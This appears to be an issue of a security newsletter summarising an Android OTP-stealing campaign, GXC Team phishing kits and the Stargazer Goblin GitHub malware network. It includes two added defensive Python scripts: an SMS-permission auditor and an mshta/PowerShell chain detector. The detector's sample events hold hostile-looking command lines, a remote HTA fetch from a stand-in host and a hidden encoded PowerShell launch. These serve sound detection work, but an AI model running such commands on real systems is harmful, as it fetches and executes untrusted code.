Android Malware Alert! 📱

Aug 02 2024



Welcome to Gone Phishing, your weekly cybersecurity newsletter that always wins the gold against the hackers 🥇🥇🥇

Now let’s delve into this week’s hottest cybersecurity news stories:

  • 👾 100k+ malware Android apps deployed to steal OTP codes 👨🏻‍💻

  • 🎣 Phishing kits bundled with malicious Android apps by AI 🤖

  • ✨ 'Stargazer Goblin' creates 3,000 fake GitHub accounts 🎭

Paranoid, Android? 👀

🚨 Android Malware Alert! 📱

A large-scale campaign using malicious Android apps has been stealing users' SMS messages since February 2022. Over 107,000 unique malware samples have been found, targeting one-time passwords (OTPs) for identity fraud. 😱 

🌐 Global Reach

Victims have been detected in 113 countries, with India and Russia hit hardest, followed by Brazil, Mexico, the U.S., Ukraine, Spain, and Turkey. This malware is intercepting OTPs from over 600 global brands. 🌎

πŸ•΅οΈ How It Works

  • Deceptive Ads: Victims are tricked into installing malicious apps through fake ads mimicking Google Play Store listings or Telegram bots.

  • SMS Access: Once installed, these apps request access to SMS messages and transmit them to one of 13 command-and-control (C2) servers. 📲

⚠️ Hidden Threat

The malware stays hidden, monitoring incoming SMS messages for OTPs used in online account verification. This allows hackers to commit identity fraud and create fake accounts. 🔐

💸 Payment Methods

Threat actors behind this campaign accept cryptocurrency and other payments to fuel a service called Fast SMS (fastsms[.]su), selling access to virtual phone numbers. 💰

🔍 Google’s Response

Google Play Protect, enabled by default on devices with Google Play Services, offers automatic protection against known malware versions. 🛡️

🚀 Continued Threat

Malicious actors continue to abuse Telegram for malware distribution and C2 operations. Recent discoveries include SMS Webpro and NotifySmsStealer targeting users in Bangladesh, India, and Indonesia. 📩

💻 Expanding to Other Platforms

The malware ecosystem is growing, with TgRAT, a Windows remote access trojan, now including a Linux variant. This malware can download files, take screenshots, and run commands remotely. 🖥️

🛡️ Stay Safe

  • Avoid Suspicious Apps: Only download apps from trusted sources.

  • Enable Google Play Protect: Ensure it’s active on your device.

  • Be Wary of Phishing: Don't click on suspicious links in messages or emails. 🕵️‍♂️

Stay vigilant and protect your personal information! 🛡️

The Daily Newsletter for Intellectually Curious Readers

  • We scour 100+ sources daily

  • Read by CEOs, scientists, business owners and more

  • 3.5 million subscribers

Sign up today!

I’d rather be phishing 🎣 

🚨 GXC Team's Malicious Android Apps Campaign Unveiled! 📱

The GXC Team, a Spanish-speaking cybercrime group, has been bundling phishing kits with malicious Android apps, elevating malware-as-a-service (MaaS) offerings to a new level. 🕵️‍♂️

📅 Timeline & Reach

Tracked by Group-IB since January 2023, this campaign targets users of 36 Spanish banks, governmental bodies, and 30 institutions worldwide. They’ve identified 288 phishing domains and affected users in countries like the U.S., U.K., Slovakia, and Brazil. 🌎

πŸ›‘οΈ How It Works

  • Phishing Kits: Sold for $150 to $900 a month, targeting financial and governmental services.

  • Malicious Apps: Bundled with the phishing kit for $500/month, designed to intercept OTPs and SMS messages. 📲

🚀 Attack Method

Victims are tricked into downloading fake banking apps via smishing or deceptive ads. These apps request permissions to become the default SMS app, intercepting OTPs and other messages, and sending them to a Telegram bot controlled by the attackers. 🕵️‍♀️

🔒 Advanced Features

  • AI-Powered Calls: AI tools generate convincing voice calls to extract 2FA codes or trick users into installing more malicious apps.

  • WebView Exploits: The app opens genuine bank websites to appear legitimate while stealing information. 📞

🛠️ Services Offered

  • Stolen Credentials: Sale of banking credentials.

  • Custom Coding: For other cybercriminals targeting financial institutions and cryptocurrency exchanges. 💸

🔬 Security Insights

  • AI in Phishing: AI-powered voice cloning mimics human speech, making phishing schemes more convincing.

  • Adversary-in-the-Middle (AiTM): Phishing kits with AiTM capabilities lower the barrier for large-scale phishing campaigns.

  • Progressive Web Apps (PWAs): Used to create fake login pages for phishing. 🛡️

📢 Expert Warnings

Phishing kits with AiTM capabilities can manipulate authentication flows, breaking into accounts even protected by passkeys. Attackers use techniques like embedding encoded scripts in error prompts, tricking users into running malicious PowerShell commands. 🖥️

🔐 Stay Safe

  • Avoid Suspicious Links: Be cautious of emails or messages prompting app downloads.

  • Check App Permissions: Scrutinise app permissions, especially for SMS access.

  • Use Robust Security Measures: Keep security software updated and enable protections like Google Play Protect. 🛡️

Stay vigilant against evolving cyber threats! 🚀
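Both Android stories above hinge on the same thing: an app that holds SMS permissions, or has been made the default SMS app, can read every OTP that arrives. As an added example that is not from the newsletter or from any of the reports it summarises, the script below turns the "check app permissions" advice into a repeatable audit. It parses a `dumpsys package` dump for apps that have been granted SMS permissions and flags any that are not the user's chosen default SMS app. The dump text is constructed here and trimmed to the lines the parser needs; the real `adb shell dumpsys package` output carries the same `Package [...]` and `granted=true` lines with much more around them (the exact layout is an assumption of this example), and the default SMS package is assumed to come from `adb shell settings get secure sms_default_application`.

```python
from __future__ import annotations

import re

# Permissions that let an app read or intercept text messages (and so OTPs).
SMS_PERMISSIONS = {
    "android.permission.RECEIVE_SMS",
    "android.permission.READ_SMS",
    "android.permission.SEND_SMS",
    "android.permission.RECEIVE_MMS",
}

# Constructed sample: a trimmed-down `dumpsys package` dump for three apps.
# Only the lines the parser needs are kept; a real dump has many more.
SAMPLE_DUMP = """\
Package [com.bank.legit] (1a2b3c):
    requested permissions:
      android.permission.INTERNET
      android.permission.USE_BIOMETRIC
    User 0: installed=true
      runtime permissions:
Package [com.example.smsclient] (4d5e6f):
    requested permissions:
      android.permission.RECEIVE_SMS
      android.permission.READ_SMS
      android.permission.SEND_SMS
    User 0: installed=true
      runtime permissions:
        android.permission.RECEIVE_SMS: granted=true, flags=[ USER_SET ]
        android.permission.READ_SMS: granted=true, flags=[ USER_SET ]
        android.permission.SEND_SMS: granted=true, flags=[ USER_SET ]
Package [com.bankupdate.free] (7g8h9i):
    requested permissions:
      android.permission.RECEIVE_SMS
      android.permission.READ_SMS
      android.permission.INTERNET
    User 0: installed=true
      runtime permissions:
        android.permission.RECEIVE_SMS: granted=true, flags=[ USER_SET ]
        android.permission.READ_SMS: granted=true, flags=[ USER_SET ]
"""

PKG_RE = re.compile(r"^Package \[([^\]]+)\]")
GRANT_RE = re.compile(r"^\s+(android\.permission\.[A-Z_]+): granted=(true|false)")


def parse_granted_permissions(dump: str) -> dict[str, set[str]]:
    """Map each package name to the set of runtime permissions currently granted.

    Lines under "requested permissions:" have no "granted=" suffix, so only
    actual grants are collected.
    """
    granted: dict[str, set[str]] = {}
    current = None
    for line in dump.splitlines():
        m = PKG_RE.match(line)
        if m:
            current = m.group(1)
            granted.setdefault(current, set())
            continue
        m = GRANT_RE.match(line)
        if m and current and m.group(2) == "true":
            granted[current].add(m.group(1))
    return granted


def find_sms_readers(dump: str, default_sms_app: str) -> list[tuple[str, list[str]]]:
    """Return (package, sorted SMS permissions) for every app that can read SMS
    but is not the user's default SMS app; those are the ones worth reviewing."""
    findings = []
    for pkg, perms in parse_granted_permissions(dump).items():
        sms = sorted(perms & SMS_PERMISSIONS)
        if sms and pkg != default_sms_app:
            findings.append((pkg, sms))
    return findings


if __name__ == "__main__":
    # On a real device: adb shell dumpsys package > dump.txt
    #                   adb shell settings get secure sms_default_application
    for pkg, perms in find_sms_readers(SAMPLE_DUMP, "com.example.smsclient"):
        print(f"REVIEW {pkg}: holds {', '.join(perms)}")
```

On the constructed dump the legitimate banking app holds no SMS permission, the default messaging client is skipped because it is the chosen default, and only `com.bankupdate.free` is reported. An app that has made itself the default SMS app would be skipped by this check, so the default package name itself deserves a look whenever it is not a messaging app the user recognises.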

He’s Goblin up GitHub accounts 🧟‍♂️

🚨 Stargazer Goblin's Malware Distribution Network on GitHub! 🌐

A threat actor known as Stargazer Goblin has established a network of inauthentic GitHub accounts to fuel a Distribution-as-a-Service (DaaS) scheme. This operation has netted them $100,000 in illicit profits over the past year. 💸

📅 Timeline & Reach

Active since August 2022, the network consists of over 3,000 accounts and thousands of repositories used to share malicious links or malware. Check Point has dubbed this operation the "Stargazers Ghost Network." 🌌

🚀 Attack Method

  • Malware Propagation: The network distributes various information-stealing malware, including Atlantida Stealer, Rhadamanthys, RisePro, Lumma Stealer, and RedLine.

  • Bogus Accounts: These accounts engage in starring, forking, watching, and subscribing to repositories to lend a veneer of legitimacy. 👻

🛠️ Services Offered

  • Phishing Repository Templates: Accounts serving phishing templates.

  • Image Provisioning: Accounts providing images for phishing templates.

  • Malware Distribution: Accounts pushing malware to repositories as password-protected archives masquerading as cracked software and game cheats. 🕹️

🔒 Advanced Tactics

  • Resilience to Takedowns: When malicious repositories are flagged and accounts banned, Stargazer Goblin updates links to new active malicious releases, minimising disruption.

  • Compromised Accounts: Evidence suggests some accounts were compromised, likely through stealer malware, to add legitimacy and expand the network. 🔄

📢 Security Insights

  • Stealth Techniques: By making accounts appear legitimate through normal user activities, the network avoids detection.

  • Sophisticated Operation: Utilising multiple accounts performing different activities (starring, hosting, committing) minimises losses when GitHub intervenes. 🌐

📉 Campaign Impact

Check Point discovered a campaign where a GitHub repository link led to a PHP script on a WordPress site, delivering an HTML Application (HTA) file to execute Atlantida Stealer via a PowerShell script. Other propagated malware includes Lumma Stealer, RedLine Stealer, Rhadamanthys, and RisePro. 🛡️
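The delivery chain Check Point describes (repository link, then a PHP script, then an HTA file, then PowerShell) leaves a characteristic process tree on the endpoint, which is where a defender can catch it regardless of which stealer is at the end. As an added example that is not part of the newsletter or of Check Point's report, the detection logic below flags `mshta.exe` started with a remote URL and any PowerShell process whose parent is `mshta.exe`, running over a constructed list of process-creation events. The events carry only pid, parent pid, image path and command line, the fields a Sysmon Event ID 1 record or an EDR process event would supply; the event shape and the sample command lines are assumptions of this example.

```python
from __future__ import annotations

import ntpath
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (constructed shape for this example)."""
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str    # command line as logged


def _base(image: str) -> str:
    """Lower-cased file name, so C:\\Windows\\System32\\mshta.exe -> mshta.exe."""
    return ntpath.basename(image).lower()


# mshta fetching its HTA over HTTP(S) rather than from a local file.
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# PowerShell's -EncodedCommand switch and the abbreviations it accepts.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?(?=\s)")


def detect_hta_chains(events: list[ProcEvent]) -> list[str]:
    """Return one alert string per suspicious event.

    Two rules, mirroring the HTA-to-PowerShell stage of the chain:
      1. mshta.exe whose command line points at a remote URL.
      2. powershell.exe / pwsh.exe whose parent process is mshta.exe
         (noted as an encoded command if -enc style switches are present).
    """
    by_pid = {e.pid: e for e in events}
    alerts: list[str] = []
    for e in events:
        name = _base(e.image)
        parent = by_pid.get(e.ppid)
        pname = _base(parent.image) if parent else ""
        if name == "mshta.exe" and URL_RE.search(e.cmdline):
            alerts.append(f"pid {e.pid}: mshta.exe launched with a remote HTA ({e.cmdline})")
        if name in ("powershell.exe", "pwsh.exe") and pname == "mshta.exe":
            enc = " (encoded command)" if ENCODED_RE.search(e.cmdline) else ""
            alerts.append(f"pid {e.pid}: PowerShell spawned by mshta.exe{enc}")
    return alerts


# Constructed sample events: one benign desktop session plus a remote-HTA chain.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://example.invalid/update.php"),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -enc AAAA"),
    ProcEvent(400, 100, r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\Users\me\help.hta"),
    ProcEvent(500, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -File backup.ps1"),
]


if __name__ == "__main__":
    for alert in detect_hta_chains(SAMPLE_EVENTS):
        print("ALERT", alert)
```

On the sample data the local `help.hta` launch and the scheduled `backup.ps1` run stay quiet; only the remote HTA fetch and the PowerShell it spawns are reported. The parent-child rule is the more robust of the two, since the URL can be hidden behind a redirect or a short link, while the process tree cannot.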

🖥️ Multi-Platform Presence

Beyond GitHub: The network extends to other platforms like Discord, Facebook, Instagram, X, and YouTube, where similar 'Ghost' accounts operate. 📱

🚨 Recent Developments

  • Extortion Campaign: Since February 2024, unknown actors have targeted GitHub repositories, wiping contents and demanding ransom via Telegram.

  • Phishing Attacks: Developers targeted with phishing emails, tricked into authorising malicious OAuth apps that erase repositories. 📨

🔐 Securing Your Repositories

Cross Fork Object Reference (CFOR) Vulnerability: Truffle Security warns that sensitive data from deleted forks and repositories can still be accessed. Organisations must secure against this vulnerability, as private and public repository data may be more accessible than believed. 🛡️

🛠️ GitHub's Design Decisions

GitHub’s documentation clarifies that commits to any repository in a fork network can be accessed from any repository in the same network, including upstream repositories. This design decision can lead to unexpected data exposure. 🔍

🔍 Key Takeaways

  • Vigilance Needed: Regularly monitor and secure repositories against unauthorised access.

  • Be Aware: Understand GitHub's data access policies to protect sensitive information.

  • Stay Updated: Follow security advisories and implement recommended measures to safeguard your data. 🛡️

Stay alert and protect your code from evolving cyber threats! 🚀

That’s all for this week, cyber squad!

πŸ—žοΈ Extra, Extra! Read all about it! πŸ—žοΈ

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • πŸ›‘οΈ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday πŸ“…

  • πŸ’΅Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for πŸ†“

  • πŸ“ˆBitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future πŸ‘Ύ

Let us know what you think.

So long and thanks for reading all the phish!
